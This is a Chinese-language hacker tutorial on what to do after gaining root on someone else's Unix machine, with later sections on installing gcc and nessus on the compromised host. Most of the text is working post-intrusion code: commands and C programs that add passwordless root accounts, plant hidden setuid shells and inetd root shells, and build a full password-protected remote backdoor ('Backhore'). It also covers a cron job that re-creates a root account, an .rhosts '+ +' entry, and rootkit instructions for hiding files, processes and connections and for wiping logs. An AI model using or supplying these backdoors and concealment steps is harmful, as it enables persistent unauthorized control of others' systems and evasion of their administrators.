unix系统攻克之后
首语: 得到了系统了root之后,要做什么呢?自己的看法:
先是留上几个后门,目的自然明白,为自己能以后进去开个方便之门,再是隐藏自己吧!之后看看有没有gcc,好用来编译程序,没有?给他装上一个.他速度不错,用来扫描很好,那装个nessus。想法好象很好,如何实现,看下面拉:
第一部分 后门及隐藏自己
1.0后门:
1.0.1给/etc/passwd和/etc/passwd加个用户:
echo "hacker::0:0::/:/bin/sh">>/etc/passwd
echo "hacker::::::">>/etc/shadow
手工麻烦,用别人用程序来:
<++> backdoor/backdoor1.c
#include <stdio.h>
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/root:/bin/sh/n");
}
<--> 不过容易给root发现,来改进一下:
改其中一些不太常用的用户,如games,先把cp /etc/passwd /etc/passwdold,在用vi来修改/etc/passwdold games的的uid和gid为0还有得到的shell,games行如下:
games::0:0::/:/bin/sh
第二次改进,加用户到/etc/passwd中间的位置:(这个是看别人的呵呵,还没试!)
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected] linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each /(or approximately that/).
split -$linecount[1] ./temppass # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...还是容易给发现,加个普通的用户,下面的方法来得到root权限
1.0.2setuid shell
方法:
cp /bin/sh /tmp/.sh
chmod u+s /tmp/.sh
以后只要运行/tmp/.sh 就可以得到root。
不过/tmp的数据容易给消除,可以放在其他的目录用程序来看看:
<++> backdoor/backdoor2.c
#include <stdio.h>
main()
{
system("cp /bin/sh /tmp/fid");
system("chown root.root /tmp/fid");
system("chmod 4755 /tmp/fid");
}
<--> 1.0.3进程后门
打开/etc/inetd.conf 文件,形式如下,不详细解析,你自己看相关说明。
服务名 套接字类型 协议类型 wait/nowait 用户名 服务程序路径 服务名和参数
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd看到这样一行:
daytime stream tcp nowait root internal把这一行改为自己想要的:
daytime stream tcp nowait root /bin/sh sh -i
重新启动inetd
kill -9 /usr/sbin/inetd or /usr/etc/inetd那些已知的服务在/etc/services可以找的到。其格式如下
(1) (2)/(3) (4)
smtp 25/tcp mail 可以添加一个自己的服务:
evil 22/tcp evil
然后在/etc/inetd.conf加入:
evil stream tcp nowait root /bin/sh sh -i
重新启动inetd
kill -9 /usr/sbin/inetd or /usr/etc/inetd如果启动个shell,那就可以远程登陆,看看下面的摘录:
更好、更隐蔽的方法是伪造网络服务,让它能够在更难以察觉的情况下为我们提供后门,例如口令保护等。如果能够在不通过 telnetd 连接的情况下轻松地进行远程访问,那是再好不过了。方法就是将“自己的”守护程序绑定到某个端口,该程序对外来连接不提供任何提示符,但只要直接输入了正确的口令,就能够顺利地进入系统。以下是这种后门的一个示范程序。(注:这个程序写得并不很完整。)
<++> backdoor/remoteback.c
/* Coders:
Theft Help from:
Sector9, Halogen Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle,halogen,
Psionic, g0d, Psionic.
Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH),
Global Hell(gH), Team Sploit, Hong Kong Danger Duo,
Tg0d, EHAP.
Usage:
Setup:
# gcc -o backhore backhore.c # ./backdoor password &
Run:
Telnet to the host on port 4000. After connected you
Will not be prompted for a password, this way it is less
Obvious, just type the password and press enter, after this
You will be prompted for a command, pick 1-8. Distributers:
Ethical Mutiny Crew */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h> #define PORT 4000
#define MAXDATASIZE 100
#define BACKLOG 10
#define SA struct sockaddr void handle(int);
int
main(int argc, char *argv[])
{
int sockfd, new_fd, sin_size, numbytes, cmd;
char ask[10]="Command: ";
char *bytes, *buf, pass[40];
struct sockaddr_in my_addr; struct sockaddr_in their_addr;
printf("/n Backhore BETA by Theft/n");
printf(" 1: trojans rc.local/n");
printf(" 2: sends a systemwide message/n");
printf(" 3: binds a root shell on port 2000/n");
printf(" 4: creates suid sh in /tmp/n");
printf(" 5: creates mutiny account uid 0 no passwd/n");
printf(" 6: drops to suid shell/n");
printf(" 7: information on backhore/n");
printf(" 8: contact/n"); if (argc != 2) {
fprintf(stderr,"Usage: %s password/n", argv[0]);
exit(1);
} strncpy(pass, argv[1], 40);
printf("..using password: %s../n", pass); if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
} my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(PORT);
my_addr.sin_addr.s_addr = INADDR_ANY; if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {
perror("bind");
exit(1);
} if (listen(sockfd, BACKLOG) == -1) {
perror("listen");
exit(1);
} sin_size = sizeof(SA);
while(1) { /* main accept() loop */
if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
perror("accept");
continue;
}
if (!fork()) {
dup2(new_fd, 0);
dup2(new_fd, 1);
dup2(new_fd, 2);
fgets(buf, 40, stdin);
if (!strcmp(buf, pass)) {
printf("%s", ask);
cmd = getchar();
handle(cmd);
}
close(new_fd);
exit(0);
}
close(new_fd);
while(waitpid(-1,NULL,WNOHANG) > 0); /* rape the dying children */
}
} void
handle(int cmd)
{
FILE *fd; switch(cmd) {
case '1':
printf("/nBackhore BETA by Theft/n");
printf("[email protected]/n");
printf("Trojaning rc.local/n");
fd = fopen("/etc/passwd", "a+");
fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh");
fclose(fd);
printf("Trojan complete./n");
break;
case '2':
printf("/nBackhore BETA by Theft/n");
printf("[email protected]/n");
printf("Sending systemwide message../n");
system("wall Box owned via the Ethical Mutiny Crew");
printf("Message sent./n");
break;
case '3':
printf("/nBackhore BETA by Theft/n");
printf("[email protected]/n");
printf("/nAdding inetd backdoor... (-p)/n");
fd = fopen("/etc/services","a+");
fprintf(fd,"backdoor/t2000/tcp/tbackdoor/n");
fd = fopen("/etc/inetd.conf","a+");
fprintf(fd,"backdoor/tstream/ttcp/tnowait/troot/t/bin/sh -i/n");
execl("killall", "-HUP", "inetd", NULL);
printf("/ndone./n");
printf("telnet to port 2000/n/n");
break;
case '4':
printf("/nBackhore BETA by Theft/n");
printf("[email protected]/n");
printf("/nAdding Suid Shell... (-s)/n");
system("cp /bin/sh /tmp/.sh");
system("chmod 4700 /tmp/.sh");
system("chown root:root /tmp/.sh");
printf("/nSuid shell added./n");
printf("execute /tmp/.sh/n/n");
break;
case '5':
printf("/nBackhore BETA by Theft/n");
printf("[email protected]/n");
printf("/nAdding root account... (-u)/n");
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/:/bin/bash/n");
printf("/ndone./n");
printf("uid 0 and gid 0 account added/n/n");
break;
case '6':
printf("/nBackhore BETA by Theft/n");
printf("[email protected]/n");
printf("Executing suid shell../n"); execl("/bin/sh");
break;
case '7':
printf("/nBackhore BETA by Theft/n");
printf("[email protected]/n");
printf("/nInfo... (-i)/n");
printf("/n3 - Adds entries to /etc/services & /etc/inetd.conf giving you/n");
printf("a root shell on port 2000. example: telnet <host> 2000/n/n");
printf("4 - Creates a copy of /bin/sh to /tmp/.sh which, whenever/n");
printf("executed gives you a root shell. example:/tmp/.sh/n/n");
printf("5 - Adds an account with uid and gid 0 to the passwd file./n");
printf("The login is 'mutiny' and there is no passwd.");
break;
case '8':
printf("/nBackhore BETA by Theft/n");
printf("http://theft.bored.org/n");
printf("[email protected]/n/n");
break;
default:
printf("unknown command: %d/n", cmd);
break;
}
}
<--> 1.0.4 crontab后门(/*摘录*/)
根用户的 crontab 文件放在 /var/spool/crontab/root 中,其格式如下:
(1) (2) (3) (4) (5) (6)
0 0 * * 3 /usr/bin/updatedb 1. 分钟 (0-60)
2. 小时 (0-23)
3. 日 (1-31)
4. 月 (1-12)
5. 星期 (1-7)
6. 所要运行的程序 以上内容设置该程序于每星期三 0:0 运行。要在 cron 建立后门,只需在 /var/spool/crontab/root 中添加后门程序即可。例如该程序可以在每天检查我们在 /etc/passwd 文件中增加了用户帐号是否仍然有效。以下是程序示例:
0 0 * * * /usr/bin/retract
<++> backdoor/backdoor.sh
#!/bin/csh set evilflag = (`grep eviluser /etc/passwd`)
if($#evilflag == 0) then
set linecount = `wc -l /etc/passwd`
cd
cp /etc/passwd ./temppass
@ linecount[1] /= 2
@ linecount[1] += 1
split -$linecount[1] ./temppass
echo "Meb::0:0:Meb:/root:/bin/sh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd
rm ./xa* ./temppass
echo Done...
else
endif
<--> 这个后门的利用还有很多的方法,如可以放个setuid shell 、放个shellcode等等
建立setuidshell的方法:<++> backdoor/backdoor3.c
#include <stdio.h>
#define pass "triad"
#define BUFFERSIZE 6 int main(argc, argv)
int argc;
char *argv[];{ int i=0;
if(argv[1]){
if(!(strcmp(pass,argv[1]))){
system("cp /bin/csh /bin/.swp121");
system("chmod 4755 /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
} printf("372f: Invalid control argument, unable to initialize. Retrying");
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("/nAction aborted after 10 attempts./n");
return(0);
}
<-->1.0.5.rlogin 后门
在Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法. 用户可以轻易的改变设置而不需口令就能进入. 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +", 就可以允许任何人从任何地方无须口令便能进入这个帐号. 特别当home目录通过NFS向外共享时, 入侵者更热中于此. 这些帐号也成了入侵者再次侵入的后门. 许多人更喜欢使用Rsh, 因为它通常缺少日志能力. 许多管理员经常检查 "+ +", 所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名,从而不易被发现.
# echo "+ + " > /usr/bin/.rhosts
# cat /usr/bin/.rhosts
+ +
# rlogin -l root localhost
将不用输入密码直接用root帐号rlogin登陆进你的机器
1.0.6.rootkit 这个是最精彩的部分。现在提供几个rootkit:
1.0.6.1首先是linuxrootkit5.0 可以这里下载:http://www.securityfocus.com/tools/1489
a.包含文件:
Contains backdoored versions of chfn, chsh, crontab, du, find, ifconfig, inetd, killall, linsniffer, login, ls, netstat, passwd, pidof, ps, rshd, syslogd, tcpd, top, sshd, and su. Also comes with bindshell, fix, linsniffer, thesniff, sniffchk, wted, and z2.
b.文件功能:
1 - Modified programs that hide the intruder:
ls, find, du – these programs will not count or display the intruder files the data file is ROOTKIT_FILES_FILE, defaults to /dev/ptyr. NOTE: all files can be listed with the ‘ls-/’ if SHOWFLAG is enables. Will hide any files/directories with the names, ptyr, hack.dir, and W4r3z.
ps, top, pidof – these programs will not display the intruders processes
netstat -- will not display traffic from or to specified IP addresses, user-ids, or ports
killall – will not kill the intruders hidden processes
ifconfig – will not display the PROMISC flag when sniffer is running
crontab – will hide the crackers entries- the hidden crontab entry is in the /dev/hda02 by default
tcpd – will not log connections listed in the configuration file
syslogd -- will not log connections listed in the configuration file
2 - Trojaned programs with backdoors:
chfn – new full name enter password will drop rootshell
chsh – new shell enter password will drop rootshell
passwd – rootshell if is entered as current password
login – will allow the cracker to log in under any username with the rootkit password (satori)—also if root is refused username (rewt) will work and will disable the history logging
3 - Trojaned network daemons:
inetd – rootshell listening on port 5002. the rootkit password most be entered in as the first line (satori)
rshd – the username is the rootkit password, a root shell is bound to the port [ rsh (hostname) –l (rootkit password) ]
4 - Utilities:
FIX – replaces and fixes timestamp/checksum information on files
linsniffer – a packet sniffer
sniffchk – checks to make sure the sniffer alive
wted – wtmp/utmp editor
z2 – erases entries in the wtmp/utmp/lastlog entries for a username-will only null the entry
bindshell – binds a rootshell to a port (31337) by default
c.具体使用:
c.1 其中ls du find 用于隐蔽文件,首先建立建立/dev/ptyr,然后把要隐蔽的文件加入其中,如要隐蔽的hacktool 文件
使用echo hacktool >>/dev/ptyr
c.2 ps top pidof 隐蔽进程,隐蔽进程先要建立一个/dev/ptyp文件,linuxrootkit 提供四重隐蔽进程的方法
0 0 隐蔽所有uid为0 的进程
1 p0 隐蔽所有ty0终端上的的进程
2 sniffer 隐蔽所有名为sniffer的进程
3 hack 隐蔽所有名字中包含“hack”字符串的进程
如要隐蔽所有包含“hack”的进程用
echo 3 hack >> /dev/ptyp
c.3 netstat 用于隐蔽连接,要设定/dev/ptyq 有6中隐蔽连接的方法
0 500 隐蔽所有uid为500的连接
1 128.31 隐蔽所有来自128.31.X.X的网络连接
2 128.31.9.2 隐蔽所有来自128.31.9.2的连接
3 8000 隐蔽所有来自8000端口的连接
4 6667 隐蔽所有连向6667端口的连接
5 term/socket 隐蔽所有包含term/socket路径的unix套接字
c.4 syslog 用于硬币系统日志记录,设定/dev/ptys
linuxrootkit 默认配置可以在rootkit.h中进行,关键是密码,不进行设置默认是satori。
1.0.6.2是rootkitsunos 功能说明:
------------------
rootkit release 1.
------------------After spending tons of time having to do all of this by myself,
I finally decided to write a simple makefile to do it for me.
Call me a script cracker, but I'm lazy as hell. You don't want
to use it, you don't have to. Keep in mind it takes me a max
of 40 seconds on a 4/65 to compile and install every program
here. Can you beat that by hand? :-)Here is how it works:
execute the command: ` make all install '
The following programs will be installed suid root in DESTDIR:
z2: removes entries from utmp, wtmp, and lastlog.
es: rokstar's ethernet sniffer for sun4 based kernels.
fix: try to fake checksums, install with same dates/perms/u/g.note: if you do not want these files installed suid (the administrator
has a cron to check for suid files, or the like), then type
make cleansuid and the suid bits will be removed.The following programs will be patched and an attempt at spoofing
the checksums of the files will be made. Also, these files will
be installed with the same dates, permissions, owners, and groups
of the originals. sl: become root via a magic password sent to login.
ic: modified ifconfig to remove PROMISC flag from output.
ps:
ns:
ls:
du5:
ls5:Here are some notes on the patch for `ps`:
1.
This doesn't modify the process lists, so your
processes are STILL in memory, but ps just won't
administrator has another copy of ps sitting on
Best to search for SGID kmem programs to be fairly sure.2.
An example /dev/ptyp file is as follows:0 0 Strips all processes running under root
1 p0 Strips tty p0
2 sniffer Strips all programs with the name sniffer3.
Do not leave a NULL string anywhere in the file. During
testing, I often pressed return after my last control
statement. Do not do this as it will cause a meory fault.
Do not use a character as the first line in the control file.
Remember to convert the UID's you wished masked to thier
numerical format.4.
Programs such as "top" will still show processes running.
This is bad. I'm working on a patch.Here are some notes on the patch for `netstat`:
1.
This doesn't modify network listings, so your network
connections are STILL in memory, but `netstat` just
won't display them. If another copy of `netstat` is
run on the machine, it will produce accurate results.
Best to search for SGID kmem programs to be fairly sure.2.
An example /dev/ptyq file is as follows:0 6667 # Strip all foreign irc network connections
1 23 # Strip all local telnet connections
2 .209.5 # Strip all foreign connections from cert.org
3 .175.9.8 # Strip all local connections to netsys4.netsys.com3.
Do not leave a NULL string anywhere in the file. It
will cause a memory fault. When stripping addresses,
a string search is used to compare addresses in the
control file with actaul network connections. This
could cause minor problems.4.
It would probably be better to only strip the address ONCE
for each line in the control file. Adding such commands
is trivial. Check `inet.c` for modifications.Here are some notes on the patch for `ls` && `du` && `du5` && `ls5`:
1.
ls and du are trojaned and your files will
not be listed unless you issue a / flag.2.
Example /dev/ptyrsunsnif # Strip the filename sunsnif
icmpfake # Strip the filename icmpfake3.
Would be useful if stripping uids, and gids was
included.----
later eleetz, have fun and don't fuq shit up, all it duz
iz get people put in jail. werd.第二部分 安装gcc
GCC是GNU组织的免费C编译器,Linux的很多发布缺省安装的就是这种。很多流行
的自由软件原代码基本都能在GCC编译器下编译运行。
虽然GCC有很多平台(操作系统)的版本,一般商业UNIX系统是不安装GCC的,要想在
这些操作系统上使用GCC,就必须自己动手安装。
下面主要介绍在SUN Solaris操作系统中获取GCC,安装和调试步骤。
1 取得针对操作系统和操作系统版本保持一致的GCC软件
如果你要在Solaris 2.5.1上使用GCC,要取得相映的GCC
ftp://ftp.cdit.edu.cn/pub/unix/solaris/sparc25/gcc-2.7.2.1.gz
2 解压缩
.gz表示是这是一个经过GZIP压缩过的文件。需要用gzip/gunzip软件首先
解压缩。
$ gunzip gcc-2.7.2.1.gz
3 安装
解压缩之后的就是安装包。在solaris操作系统中安装包有一套专门的命令和程序
#pkgadd -d ./gcc-2.7.2.1
在接下来的安装中,会有一个交互性安装过程。
4 调试
以gcc-2.7.2.1为例,GCC缺省安装的路径为/opt/GCC2721,这个路径可能不在
用户的PATH变量表示的范围内,所以需要对PATH变量更新,方便使用GCC。
对使用csh的用户:
% setenv PATH=$PATH:/opt/GCC2721/bin
对使用sh的用户:
$ PATH=$PATH:/opt/GCC2721/bin
$ export PATH
如果不想每次使用GCC都要更新PATH环境变量,可以将以上内容写在用户初始文件
中:
对csh用户: 写在用户主目录下的.cshrc文件中
对sh用户:写在用户主目录下的.profile文件中
5 常见问题
Q:解压缩gcc-version.gz文件时,提示"gunzip 没找到"
A:有可能是你没有事先安装gzip/gunzip软件,首先下载gzip for 相应OS,然后
安装。
还有可能是gzip/gunzip没在PATH搜索路径中,查看/usr/local/bin,如果有,
使用gunzip时加上绝对路径。
Q: 成功安装了gcc,在编译软件时出错"can't find gcc"。
A: 最大的可能就是gcc的执行目录没有在用户当前的搜索路径PATH中。按照本
文第4步讲述的方法去做。
Q: 怎么安装使用c++编译器 [added:1999/10/24]
A: gcc提供了g++作为c++的替代,一般还要使用g++的库来支持,下载针对你的OS
版本的libstdc++包,然后安装。
安装完毕,要设置LD_LIBRARY_PATH环境变量,让libstdc++库能被其它程序利用
$LD_LIBRARY_PATH=/usr/local/lib
$export LD_LIBRARY_PATH
6 有关资源
ftp://ftp.cdit.edu.cn/pub/unix/solaris/ 提供本文中所讲的gcc,gzip
http://www.gnu.org GNU组织的网站
http://metalab.unc.edu/ 北卡罗莱纳大学网站 提供了Solaris2.x,7下面的GCC等
GNU发布软件的安装包
同时也有很多原代码和linux下的软件
第三部分安装nessus及扫描
3.1.下载与安装
The easy and dangerous way (ala ximian gnome :))
If you are installing Nessus from a computer directly connected to the internet that has lynx installed, type this command (NOT as root! ) :
lynx -source http://install.nessus.org | sh
This method is considered as dangerous in the sense that if you do it, you are running commands that directly come from the internet. If someone is poisoning your domain name server, he may have you execute arbitrary commands as the user you will type this command as. The good point is that it completely automates the installation of Nessus, so if you are not under attack, you'll save some time.
the usual and boring way :
You can also install the Nessus tar archives individually.
To install Nessus, you have to download and compile these packages in the following order:
nessus-libraries
libnasl
nessus-core
nessus-plugins
See the compilation instructions if you have never compiled any tarballs before
一般都用第一种方法比较 容易实现。不过安全性就差点,因为如果你安装的时候是用普通用户还要输入root的密码,即使用root你的密码也可能被监听到。
3.2.创建一个nessusd 帐号
# nessus-adduser
Addition of a new nessusd user
------------------------------Login : renaud
Authentication (pass/cert) [pass] : pass
Password : secretUser rules
----------
nessusd has a rules system which allows you to restrict the hosts
that renaud2 has the right to test. For instance, you may want
him to be able to scan his own host only.Please see the nessus-adduser(8) man page for the rules syntax
Enter the rules for this user, and hit ctrl-D once you are done :
(the user can have an empty rules set)deny 10.163.156.1
allow 10.163.156.0/24
default denyLogin : renaud
Password : secret
DN :
Rules :deny 10.163.156.1
allow 10.163.156.0/24
default denyIs that ok (y/n) ? [y] y
user added.3.3.启动服务
#nessusd -D
3.4.连接nessusd
#nessus 打开一个窗口,按提示的则可以